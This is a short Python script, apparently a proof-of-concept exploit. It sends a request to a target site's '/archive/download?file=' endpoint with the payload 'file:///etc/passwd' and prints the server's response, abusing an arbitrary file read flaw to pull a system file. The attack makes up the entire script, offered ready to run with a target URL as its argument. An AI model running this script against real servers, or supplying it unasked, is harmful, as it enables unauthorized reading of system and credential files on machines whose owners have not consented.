import requests import sys try: URL = sys.argv[1] + '/archive/download?file=' except Exception as e: print(f'You must enter the Url associated to the website !\nUsage: {sys.argv[0]} ') print(e) payload = 'file:///etc/passwd' resp = requests.get(URL + payload) print(resp.text)